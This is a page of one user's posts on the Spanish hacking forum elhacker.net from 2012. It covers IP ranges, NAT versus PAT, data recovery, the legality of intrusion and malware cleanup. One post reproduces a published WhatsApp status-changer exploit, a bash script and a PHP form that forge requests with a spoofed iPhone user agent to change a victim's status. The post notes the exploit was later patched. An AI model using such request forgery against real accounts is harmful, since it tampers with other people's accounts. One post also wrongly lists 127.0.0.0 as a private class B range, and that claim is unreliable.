elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 ... 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 [395] 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 ... 630
3941  Comunicaciones / Redes / Re: ¿Cual es el Rango de IP? en: 24 Enero 2012, 19:41 pm
Wow, no, eso no es un rango.

Esa es una ip 127.0.0.1 con una máscara de subred 255.255.255.255, es decir una sola ip 127.0.0.1

Los rangos de ip privadas, 10.0.0.0/16 en clase A 127.0.0.0 en clase B y 192.168.0.0 en clase C no se pueden utlizar para IPs públicas

Aquí tienes el rango de ip's que usa cada ISP (AS)

http://bgp.he.net/
3942  Foros Generales / Noticias / Re: Anonymous NO atacará Facebook el próximo 28 de enero en: 24 Enero 2012, 19:29 pm
Anonymous NO atacará Facebook el próximo 28 de enero

https://twitter.com/#!/anonops/status/161535637542019072

Citar
Again we must say that we will not attack #Facebook! Again the mass media lie.

Algunos periodistas no dan ni una.

Citar
We have NO affiliation with this site, and by the looks of it, this is a SCAM -

https://twitter.com/#!/anonops/status/161791850586451968

http://t.co/4kd9jtts
3943  Seguridad Informática / Hacking / Re: Ataque Man in the middle en: 24 Enero 2012, 17:50 pm
Añadido mirror descarga:

http://ns2.elhacker.net/MITM.pdf

Añadida entrada en el blog:

http://blog.elhacker.net/2012/01/ataque-man-in-middle-en-redes-locales.html
3944  Informática / Hardware / Re: Dudas con el PHOTO REC en: 24 Enero 2012, 17:10 pm
buf parece que el disco está bastante dañado. Pero si todavía lo reconoce la BIOS y el programa PhotoRec o el TestDisk, buena señal...

Pero si salen errores o se ha quedado colgado, mejor para e intenta de nuevo.

O mira el Hiren's BootCD que incluye el programa:

Citar
Unstoppable Copier 5.2: Allows you to copy files from disks with problems such as bad sectors, scratches or that just give errors when reading data (Windows Freeware).

Hiren's BootCD - CD Autoarrancable Recuperación SOS
http://foro.elhacker.net/software/hirens_bootcd_cd_autoarrancable_recuperacion_sos-t139246.0.html
3945  Comunicaciones / Redes / Re: NAT dinámico VS PAT en: 24 Enero 2012, 16:33 pm
No sé, la verdad es que yo tampoco entiendo poque es mejor NAT que PAT, cuando teóricamente es mejor al revés (a mi entender).

NAT overloading

Citar
Las traducciones NAT se pueden usar para una variedad de propósitos y pueden asignarse de manera dinámica o estática. NAT estática está diseñada para permitir que cada dirección local se mapee a su correspondiente dirección global. Esto resulta particularmente útil para los hosts que deban tener una dirección constante que esté accesible desde la Internet. Estos hosts internos pueden ser servidores de empresas o dispositivos de networking.

NAT dinámica está diseñada para mapear una dirección IP privada a una dirección pública. Cualquier dirección IP de un conjunto de direcciones IP públicas se asigna a un host de red. La sobrecarga, o Traducción de direcciones de puerto (PAT), mapea varias direcciones IP privadas a una sola dirección IP pública. Se pueden mapear varias direcciones a una sola dirección porque cada dirección privada se diferencia por el número de puerto.

PAT utiliza números únicos de puerto origen en la dirección IP global interna para distinguir entre las traducciones. El número de puerto se codifica en 16 bits. En teoría, el número total de direcciones internas que se pueden traducir a una dirección externa podría ser hasta 65,536 por dirección IP . En realidad, el número de puertos que se pueden asignar a una sola dirección IP es aproximadamente 4000. PAT intenta preservar el puerto origen original. Si el puerto origen está en uso, PAT asigna el primer número de puerto disponible comenzando desde el principio del grupo de puertos correspondiente 0-511, 512-1023, o 1024-65535. Cuando no hay más puertos disponibles y hay más de una dirección IP externa configurada,
PAT utiliza la próxima dirección IP para tratar de asignar nuevamente el puerto origen original. Este proceso continúa hasta que no haya puertos ni direcciones IP externas disponibles.

NAT ofrece las siguientes ventajas:

• Elimina la reasignación de una nueva dirección IP a cada host cuando se cambia a un nuevo ISP. NAT elimina la necesidad de re-direccionar todos los hosts que requieran acceso externo, ahorrando tiempo y dinero.

• Conserva las direcciones mediante la multiplexión a nivel de puerto de la aplicación. Con PAT, los hosts internos pueden compartir una sola dirección IP pública para toda comunicación externa. En este tipo de configuración, se requieren muy pocas direcciones externas para admitir muchos hosts internos, y de este modo se conservan las direcciones IP

• Protege la seguridad de la red. Debido a que las redes privadas no publican sus direcciones o topología interna, ellas son razonablemente seguras cuando se las utiliza en conjunto con NAT para tener un acceso externo controlado.


Citar
Network Address Translation (NAT) and Port Address Translation (PAT) both map IP addresses on an internal network to IP addresses on an external network. Which method of address translation you use depends on the types of networks that you are translating and the number of available IP addresses that you have.

If you are connecting a site in the 10.10.10.0 network to a site in the 10.10.20.0 network, you could use NAT to translate 10.10.10.0 IP addresses to available 10.10.20.0 IP addresses so that hosts on the 10.10.10.0 network can access data and use network resources on the 10.10.20.0 network. However, for this scenario to work, you must have an address pool that contains enough available IP addresses on the 10.10.20.0 network to accommodate every host on the 10.10.10.0 network, because NAT requires a one-to-one relationship when translating IP addresses.

PAT attempts to use the original source port number of the internal host to form a unique, registered IP address and port number combination. For example, two hosts that have been assigned the IP addresses 10.10.10.100 and 10.10.10.101, respectively, could send traffic to and receive traffic from the Internet by using the single public IP address 123.45.67.89. If that port number is already allocated, PAT searches for an available alternate source port number. Therefore, the host at IP address 10.10.10.100 could access the Internet by using the public IP address and source port combination of 123.45.67.89:10000. Meanwhile, the host at IP address 10.10.10.101 could access the Internet by using the IP address and source port combination of 123.45.67.89:10001.

If you are connecting a site in the 10.10.10.0 network to the Internet, you must translate host IPs on that network to a registered IP address that is routable over the Internet. In order to use traditional NAT in this scenario, you would need to purchase a registered IP address for each host on your internal network. Alternatively, you could use PAT to translate all the IP addresses on the internal network to a single, shared IP address that connects to the Internet. PAT, which is also known as NAT overloading, uses 16-bit source port numbers to map and track traffic between an internal host and the Internet.

As you can see, the first letter in each acronym denotes the difference between NAT (Network Address Translation) and PAT (Port Address Translation), which should make it easier for you to remember which does what. Just remember that both NAT and PAT use at least one IP address and that PAT is also referred to as NAT overloading because it uses one IP address for all clients to multiple ports, whereas standard NAT uses a one-to-one IP address relationship per client.
3946  Comunicaciones / Redes / Re: servidor para subir y descargar archivos a pequeña escala para prototipo en: 23 Enero 2012, 20:58 pm
me interesa tu proyecto, suena muy interesante.

Aunque tu idea ya existe e incluso es más compleja (cifra los archivos, sincroniza, etc)

http://www.syncany.org/

Aunque veo que todavía no hay download posible jeje

Justamente estaba leyendo los comentarios de esta entrada en meneame sobre el tema:

http://www.meneame.net/story/alternativa-dropbox-megaupload-etc-open-source-empresas

- OpenDocMan (www.opendocman.com/)

Yo podría ofrecer el hosting de pruebas.
3947  Comunicaciones / Redes / Re: Conectar varios vecinos con internet, por LAN en: 23 Enero 2012, 20:47 pm
lo más complicado sería el cableado, pasar un cable de red de un piso a otro, tendrás que usar el hueco de la escalera y el cable de red es gordo, para luego entrar por dónde entra el del teléfono.

Otra opción sería hacerlo mediante wifi, pero necesitarás varios amplificadores. Me gusta tu idea, de simplemente hacer la red pero que internet cada uno pague lo suyo, porque para repartir equitativamente la conexión a internet ya es más complicado y no siempre funciona bien.
3948  Seguridad Informática / Seguridad / Re: Legalidad en la intrusión? en: 23 Enero 2012, 18:34 pm
No es legal, sigue siendo una intrusión aunque no hagas uso de la información obtenida. Lógicamente no sería tan grave, porque no has hecho ningún mal uso de la información, y recuerda que siempre la última palabra la tiene el juez.

Hay muchas opiniones al respecto qué hacer cuando se encuentra una vulerabilidad, repotar, callar, denunciar, avisar, cuánto tiempo esperar a que lo arreglen, full disclosoure o no, etc.

Deberia publicar una vulnerabilidad muy seria?
http://foro.elhacker.net/foro_libre/deberia_publicar_una_vulnerabilidad_muy_seria-t328814.0.html

¿Security Through Obscurity o Full Disclosure?
http://foro.elhacker.net/hacking_avanzado/iquestsecurity_through_obscurity_o_full_disclosure-t36775.0.html

FAQ de Advisories
http://foro.elhacker.net/bugs_y_exploits/faq_de_advisories-t247917.0.html

Como dar el reporte de una vulnerabilidad?
http://foro.elhacker.net/nivel_web/como_dar_el_reporte_de_una_vulnerabilidad-t231936.0.html
3949  Seguridad Informática / Seguridad / Re: PROBLEMA CON MI ORDENADOR en: 23 Enero 2012, 17:25 pm
tu ordenador está infecatdo por un malware/spyware que además tiene un nombre muy cutre Systen32.exe xDD

Inicia el Windows en modo a prueba de fallos o bien inicia el ordenador con una versión live-cd que contenga una antivirus para poder eliminar el spyware.

En el subforo de seguridad tienes varios temas pegados de cómo hacerlo.
3950  Seguridad Informática / Bugs y Exploits / WhatsApp Status Changer v0.2 Exploit en: 20 Enero 2012, 23:10 pm
Código
  1. #!/bin/bash
  2. #
  3. # WhatsApp Status changer v0.2 stable
  4. # A slim exploit able to change the WhatsApp
  5. # user status in a remote way.
  6. #
  7. # This program is released under the terms of the GNU General Public License
  8. # (GPL), which is distributed with this software in the file "COPYING".
  9. # The GPL specifies the terms under which users may copy and use this software.
  10. #
  11.  
  12. show_help(){
  13.   echo ""
  14.   echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  15.   echo ""
  16.   echo " --usage    show the exploit Usage"
  17.   echo " --credits  show the exploit Credits"
  18.   echo " --help     show the Help"
  19.   echo ""
  20.   echo " enJoy"
  21. }
  22.  
  23. show_credits(){
  24.   echo ""
  25.   echo " Emanuele Gentili"
  26.   echo " http://www.emanuelegentili.eu"
  27.   echo " eg @ offensive-security.it"
  28.   echo ""
  29.   echo " Stefano Fratepietro"
  30.   echo " http://steve.deftlinux.net"
  31.   echo " stefano @ deftlinux.net"
  32.   echo ""
  33.  
  34. }
  35.  
  36. show_usage(){
  37.   echo ""
  38.   echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  39.   echo ""
  40.   echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
  41.   echo ""
  42.   echo " enJoy"
  43. }
  44.  
  45.  
  46. # Bash
  47. while [[ $# != 0 ]]; do
  48.     arg_name=$1; shift
  49.     case "$arg_name" in
  50.       --help|-?|-h) show_help; exit 0;;
  51.       --credits) show_credits; exit 0;;
  52.       --usage) show_usage; exit 0;;
  53.       --countrycode) countrycode=$1; shift;;
  54.       --mobilenum) mobilenum=$2; shift;;
  55.       --text) text=$3; shift;;
  56.       *) echo "invalid option: $1"; show_help;exit 1;;
  57.     esac
  58. done
  59.  
  60. [ -z "$countrycode" ] && { show_help; exit 1; }
  61.  
  62. whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"
  63.  
  64. wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php
  65.  
  66. echo ""
  67. echo "[+] Operazione completata."
  68. echo ""


http://www.exploit-db.com/exploits/18396/

PHP

Código
  1. <form method="post">
  2.  
  3.     <dl>
  4.         <dt>Country code: (example: 31)</dt>
  5.         <dd><input type="text" name="cc" value="31" /></dd>
  6.         <dt>Phonenumber: (example: +31612345678)</dt>
  7.         <dd><input type="text" name="n" value="+316" /></dd>
  8.         <dt>New status:</dt>
  9.         <dd><input type="text" name="m" /></dd>
  10.         <dd><input type="submit" value="Change!" /></dd>
  11.     </dl>
  12.  
  13. </form>
  14.  
  15. <?php
  16. ini_set('display_errors',0);
  17. error_reporting(E_ALL|E_STRICT);
  18.  
  19. if ( $_SERVER['REQUEST_METHOD'] === 'POST' ) 
  20. {
  21.     $url = 'https://s.whatsapp.net/client/iphone/u.php';
  22.     $fields = array(
  23.         'cc' => urlencode($_POST['cc']),
  24.         'me' => urlencode($_POST['n']),
  25.         's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
  26.     );
  27.  
  28.     //url-ify the data for the POST
  29.     foreach ($fields as $key=>$value) {
  30.         $fields_string .= $key . '=' . $value . '&';
  31.     }
  32.     rtrim($fields_string, '&');
  33.  
  34.     //open connection
  35.     $ch = curl_init();
  36.  
  37.     //set the url, number of POST vars, POST data
  38.     curl_setopt($ch, CURLOPT_URL, $url);
  39.     curl_setopt($ch, CURLOPT_POST, count($fields));
  40.     curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  41.     curl_setopt($ch, CURLOPT_USERAGENT, "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
  42.  
  43.     //execute post
  44.     $result = curl_exec($ch);
  45.  
  46.     //close connection
  47.     curl_close($ch);
  48.  
  49. }
  50. ?>

Ya no funciona:

WhatsApp implemented an IP check – so this doesn’t work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/
Páginas: 1 ... 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 [395] 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 ... 630
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines